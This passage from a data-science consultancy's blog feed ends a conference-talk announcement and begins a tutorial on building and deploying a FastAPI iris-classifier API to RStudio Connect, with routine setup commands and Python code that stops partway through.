&lt;p&gt;Our CEO, Esther, will be on a &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36312&amp;s=1482" rel="external"&gt;panel&lt;/a&gt; discussing the collaboration between universities and external partners, and how this contributes to Knowledge Exchange (KE) - a vital function of universities in ensuring their knowledge can be used for the benefit of the economy and society.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Tuesday, 13 September, 2022. 14:00-15:20.&lt;/p&gt;
&lt;h3 id="dont-panic-the-ambassadors-guide-to-communicating-statistics"&gt;Don&amp;rsquo;t Panic! The Ambassadors guide to communicating statistics&lt;/h3&gt;
&lt;p&gt;Communication is a big part of what we do at Jumping Rivers. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/session/36351" rel="external"&gt;session&lt;/a&gt;, Rhian will be sharing some of the tricks she&amp;rsquo;s learnt from teaching programming - and how these can be applied to communicating statistical concepts more broadly. This group session will actively engage the audience through a number of exercises to stretch attendees’ communication skills.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Wednesday, 14 September, 2022. 10:50-11:50.&lt;/p&gt;
&lt;h3 id="reproducible-data-reports-with-quarto"&gt;Reproducible data reports with Quarto&lt;/h3&gt;
&lt;p&gt;In this hands-on &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36392&amp;s=209" rel="external"&gt;workshop&lt;/a&gt;, Rhian and Nicola will show you how to make reproducible reports using Quarto (the next-generation RMarkdown). Quarto allows users to keep their code and data integrated as they write reports. This means that, with just a click of a button, you can automatically update plots, tables and text when your data changes. In this workshop, we&amp;rsquo;ll show you how.&lt;/p&gt;
&lt;p&gt;Since this session will be interactive, if you&amp;rsquo;re coming along, please bring a laptop with internet access with you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Thursday, 15 September, 2022. 15:20-16:40.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll also be exhibiting at the conference, so please come and say hello to us!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python API deployment with RStudio Connect: FastAPI</title><link>https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/</link><pubDate>Thu, 01 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/" rel="external"&gt;Part 1: Python API deployment with RStudio Connect: Flask&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Python API deployment with RStudio Connect: FastAPI (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit" rel="external"&gt;Part 3: Python API deployment with RStudio Connect: Streamlit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/products/connect/" rel="external"&gt;RStudio Connect&lt;/a&gt; is a platform which is well known for providing the ability to deploy and share R applications such as &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; apps and &lt;a href="https://www.rplumber.io/" rel="external"&gt;Plumber&lt;/a&gt; APIs, as well as plots, models and &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;R Markdown&lt;/a&gt; reports. However, despite the name, it is not just for R developers. RStudio Connect also supports a growing number of Python applications, including &lt;a href="https://flask.palletsprojects.com/en/2.1.x/" rel="external"&gt;Flask&lt;/a&gt; and &lt;a href="https://fastapi.tiangolo.com/" rel="external"&gt;FastAPI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;FastAPI is a lightweight web framework and, as you can probably tell by the name, it&amp;rsquo;s fast. It provides similar functionality to Flask in that it allows the building of web applications and APIs. However, it is newer and is built on the &lt;a href="https://asgi.readthedocs.io/en/latest/" rel="external"&gt;ASGI&lt;/a&gt; (Asynchronous Server Gateway Interface) standard. One of the nice features of FastAPI is that it is built on the &lt;a href="https://www.openapis.org/" rel="external"&gt;OpenAPI&lt;/a&gt; and JSON Schema standards, which means it can provide automatic interactive API documentation with &lt;a href="https://swagger.io/tools/swagger-ui/" rel="external"&gt;SwaggerUI&lt;/a&gt;. You also get validation for most Python data types with Pydantic. FastAPI is therefore another popular choice for data scientists when creating APIs to interact with and visualize data.&lt;/p&gt;
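&lt;p&gt;To give a feel for what ASGI means in practice, here is a minimal sketch of a bare ASGI application written without any framework. This is not how FastAPI is implemented; it only illustrates the calling convention that an ASGI server expects. The &lt;code&gt;call_once&lt;/code&gt; helper is a hypothetical stand-in for a server so that the example runs with the standard library alone.&lt;/p&gt;

```python
import asyncio


async def app(scope, receive, send):
    """A bare ASGI application: answer every HTTP request with plain text."""
    if scope["type"] != "http":
        return  # this sketch ignores lifespan and websocket events
    await send({
        "type": "http.response.start",
        "status": 200,
        "headers": [(b"content-type", b"text/plain")],
    })
    await send({"type": "http.response.body", "body": b"Hello from ASGI"})


async def call_once(asgi_app, path="/"):
    """Hypothetical helper: drive the app in-process, without a real server."""
    sent = []

    async def receive():
        # A single empty request body, as a GET request would have
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        sent.append(message)

    await asgi_app({"type": "http", "method": "GET", "path": path}, receive, send)
    return sent


messages = asyncio.run(call_once(app))
print(messages[0]["status"], messages[1]["body"])
```

&lt;p&gt;A framework such as FastAPI hides these details behind routes and type hints, while an ASGI server takes care of turning network traffic into the &lt;code&gt;scope&lt;/code&gt;, &lt;code&gt;receive&lt;/code&gt; and &lt;code&gt;send&lt;/code&gt; arguments.&lt;/p&gt;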
&lt;p&gt;In this blog post we will go through how to deploy a simple machine learning API to RStudio Connect.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-python-api-deployment-with-rstudio-connect-fastapi"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="first-steps"&gt;First steps&lt;/h3&gt;
&lt;p&gt;First of all we need to create a project directory and install FastAPI. Unlike Flask, FastAPI doesn&amp;rsquo;t have an inbuilt web server implementation. Therefore, in order to run our app locally, we will also need to install an ASGI server such as &lt;a href="https://www.uvicorn.org/" rel="external"&gt;uvicorn&lt;/a&gt;,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create a project repo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir fastapi-rsconnect-blog &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd fastapi-rsconnect-blog
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create and source a new virtual environment &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# install FastAPI and uvicorn&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install fastapi
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install &lt;span style="color:#a5d6ff"&gt;&amp;#34;uvicorn[standard]&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let&amp;rsquo;s start with a basic &amp;ldquo;hello world&amp;rdquo; app which we will create in a file called &lt;code&gt;fastapi_hello.py&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch fastapi_hello.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our hello world app in FastAPI will look something like,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# fastapi_hello.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fastapi&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; FastAPI
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a FastAPI instance&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; FastAPI()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;root&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#34;message&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello World&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can be run with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uvicorn fastapi_hello:app --reload
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You will get an output with the link to where your API is running.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;INFO: Uvicorn running on http://127.0.0.1:8000 &lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;Press CTRL+C to quit&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check it is working by navigating to &lt;a href="http://127.0.0.1:8000" rel="external"&gt;http://127.0.0.1:8000&lt;/a&gt; in your browser.&lt;/p&gt;
&lt;h3 id="example-ml-api"&gt;Example ML API&lt;/h3&gt;
&lt;p&gt;Now for a slightly more relevant example! In the pipeline of a data science project, a crucial step is often deploying your model so that it can be used in production. In this example we will use a simple API which allows access to the predictions of a model. Details on the model and creating APIs with FastAPI are beyond the scope of this blog, however this allows for a more interesting demo than &amp;ldquo;hello world&amp;rdquo;. If you are getting started with FastAPI this &lt;a href="https://fastapi.tiangolo.com/tutorial/" rel="external"&gt;tutorial&lt;/a&gt; covers most of the basics.&lt;/p&gt;
&lt;p&gt;We will need to install a few more packages in order to run this example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install scikit-learn joblib numpy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our demo consists of a &lt;code&gt;train.py&lt;/code&gt; script which trains a few machine learning models on the classic Iris dataset and saves the fitted models to &lt;code&gt;.joblib&lt;/code&gt; files. We then have a &lt;code&gt;fastapi_ml.py&lt;/code&gt; script where we build our API. This loads the trained models and uses them to predict the species classification for a given iris data entry.&lt;/p&gt;
&lt;p&gt;First we will need to create the script in which we will train our models:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch train.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and then copy in the code below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# train.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;joblib&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.datasets&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; load_iris
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.naive_bayes&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; GaussianNB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.neighbors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; KNeighborsClassifier
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.svm&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; SVC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load in the iris dataset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dataset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; load_iris()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Get features and targets for training&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;features &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dataset&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;targets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dataset&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;target
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Define a dictionary of models to train&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;classifiers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GaussianNB&amp;#34;&lt;/span&gt;: GaussianNB(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;: KNeighborsClassifier(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SVM&amp;#34;&lt;/span&gt;: SVC(gamma&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, C&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Fit models&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; model, clf &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; classifiers&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit(features, targets)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;model&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;_model.joblib&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;wb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; joblib&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dump(clf, file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Save target names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#a5d6ff"&gt;&amp;#34;target_names.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;wb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;savetxt(file, dataset&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;target_names, fmt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;%s&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will then need to run this script with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python train.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You should now see a &lt;code&gt;target_names.txt&lt;/code&gt; file in your working directory, along with the &lt;code&gt;&amp;lt;model name&amp;gt;_model.joblib&lt;/code&gt; files.&lt;/p&gt;
&lt;p&gt;Next we will create a file for our FastAPI app,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch fastapi_ml.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and copy in the following code to build our API.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# fastapi_ml.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;enum&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Enum
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;joblib&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fastapi&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; FastAPI
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pydantic&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; BaseModel
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.datasets&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; load_iris
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.naive_bayes&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; GaussianNB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.neighbors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; KNeighborsClassifier
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.svm&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; SVC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create an Enum class with class attributes with fixed values.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; &lt;span style="color:#f0883e;font-weight:bold"&gt;ModelName&lt;/span&gt;(str, Enum):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gaussian_nb &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GaussianNB&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; knn &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; svm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SVM&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a request body with pydantic&amp;#39;s BaseModel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; &lt;span style="color:#f0883e;font-weight:bold"&gt;IrisData&lt;/span&gt;(BaseModel):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sepal_length: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sepal_width: float
